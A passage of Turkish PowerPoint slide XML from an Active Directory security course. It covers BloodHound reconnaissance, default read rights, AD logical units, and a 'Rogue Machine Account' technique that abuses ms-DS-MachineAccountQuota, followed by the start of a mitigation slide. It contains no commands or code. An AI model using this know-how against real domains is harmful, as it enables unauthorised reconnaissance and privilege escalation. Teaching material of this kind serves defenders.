              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bilgisayarınıza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>indiriniz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. (https://github.com/BloodHoundAD/BloodHound/releases) • Elde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ettiğiniz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veriyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uygulamasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>analiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ediniz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782955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6DCA3-EA0B-7717-0E98-76CC1715B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Önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not – Bilgi Toplama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864F6-314D-ED5A-C3CD-DFB0FD951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Varsayılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>konfigürasyonda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkisiz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kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>birçok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veriyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>okuyabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Bahsedilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>araçların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çalışması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>mantığa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dayanmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.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Bu durum da Authenticated Users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>grubunun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objeler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>varsayılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkisinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bulunmasından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ötürü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kaynaklanmaktadır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70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4DA3A-F9DE-CC71-9E51-9B1319702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D957C07-268D-F920-A3E7-B9ADF5FE0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Mantıksal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Birimler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Obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Türleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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CA6C742-F31E-5E2E-32BD-2FC45490C9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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Forest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Çoğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> zaman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kurumun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ortamını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>barındıran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geniş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>mantıksal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>birimdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Fakat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bazı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>senaryolarda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kurum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>içerisinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>birden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>fazla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Forest da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bulunabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Küçük</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>orta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ölçekli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kurumlarda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ortamını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>barındıran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>mantıksal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>birimdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Fakat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>büyük</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>organizasyonlarda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>farklı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>departmanlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>farklı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yapıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanılmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Organizational Unit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Objelerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> iyi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yönetilebilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>rollerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>göre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ayrılabilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>konteynerlerdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Objelerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>gruplanması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yetkilerinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kolayca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yönetilebilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>aktarılabilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>birimlerdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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2B25FD-5A24-CCF8-E47B-8B11CE908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617" y="1825625"/>
            <a:ext cx="4916765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907475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7A95B-F1BA-5EAD-8D3C-E33BB1752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LATERAL MOVEMENT PRIVILEGE ESCALATION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904ACD-CDF9-6C62-67D2-E415031A47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6570" y="1825625"/>
            <a:ext cx="651886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722709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44104-6FFF-971C-6C73-D74F2D64B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TTP 0x0 – Rogue Machine Account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8EB0B5-8DC9-08CA-BAA2-F954385607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97665"/>
            <a:ext cx="10515600" cy="32072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617950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F065E-8167-0BC8-16F8-E0BE69717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TTP 0x0 – Rogue Machine Account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B9B6E-70AB-C2DD-92A1-7AFF3F6E3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Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>varsayılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcılar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (Authenticated Users) domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>adet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ekleyebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>değer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-DS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>MachineAccountQuota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>değişkeniyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>belirlenmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yöntem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>başına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>büyük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etki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oluşturamasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> bile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>birçok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yönteminin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> ilk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>aşaması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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1E786E-7E13-1E77-C140-94321079F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" y="4013905"/>
            <a:ext cx="11610975" cy="196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670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05DB4-F31E-B709-68B8-6ADAC47DF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TTP 0x0 – Rogue Machine Account - Mitigation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26696-AEBC-FE69-25AD-67E9DE02E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Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yöntemini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>engellemek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
